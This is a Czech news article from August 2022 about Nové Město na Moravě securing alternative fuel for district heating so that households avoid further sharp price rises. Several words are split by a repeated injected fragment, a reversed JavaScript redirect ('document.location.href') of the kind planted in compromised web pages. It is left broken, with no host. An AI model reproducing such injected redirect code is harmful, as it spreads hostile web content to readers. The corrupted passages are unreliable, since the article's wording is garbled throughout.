Rainbow page separator

Domácnosti vytápěné centrálně nečeká další prudké zdražení

Pátek, 5. srpna 2022

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Zabezpečit dost tepla pro domy a byty obyvatel Nového Města se ve spolupráci v Novoměstskou teplárenskou snaží tamní radnice. Posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovateli tepla se již pro nadcházející zimu podařilo zajistit dostatečné množství alternativního paliva v náhradě za plyn, pokud by byl ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nedostupný.
„Situace s plynem je hodně složitá a máme obavy před blížící se zimou. Ceny energií rychle ros[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou a vyloučeny zatím nejsou ani výpadky v dodávkách. Jsem rád, že se podařilo zajistit alternativní palivo. Jeho použití si sice vyžádá úpravu technologie, ale Novoměstská teplárenská si ho zajistila za nižší cenu a v dostatečném množství. Lidem, kteří jsou na centrální teplo napojeni, tak nehrozí další prudké zdražení ani jiné vážné problémy v dodávkách,“ informoval novoměstský starosta Michal Šmarda.
Nemělo by tak dojít k situaci z loňského roku, kdy ceny plynu, elektřiny i tepla poprvé prudce vzrostly. Lidem, kteří se náhle ocitli v komplikované situaci, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];to ať už kvůli ukončení činnosti některých dodavatelů plynu a elektřiny, anebo z důvodu výrazného navýšení cen za teplo, se měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];to snažilo pomoci prostřednictvím mimořádných půjček z fondu rozvoje bydlení. Od té doby však ceny energií na trhu opět razantně vzrostly. „Pro le[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní rok máme zatím zajištěn plyn i elektřinu za slušné ceny. O elektřinu se nemusíme bát ani příští rok. O plynu snad bude jasno do konce srpna,“ upřesnil starosta.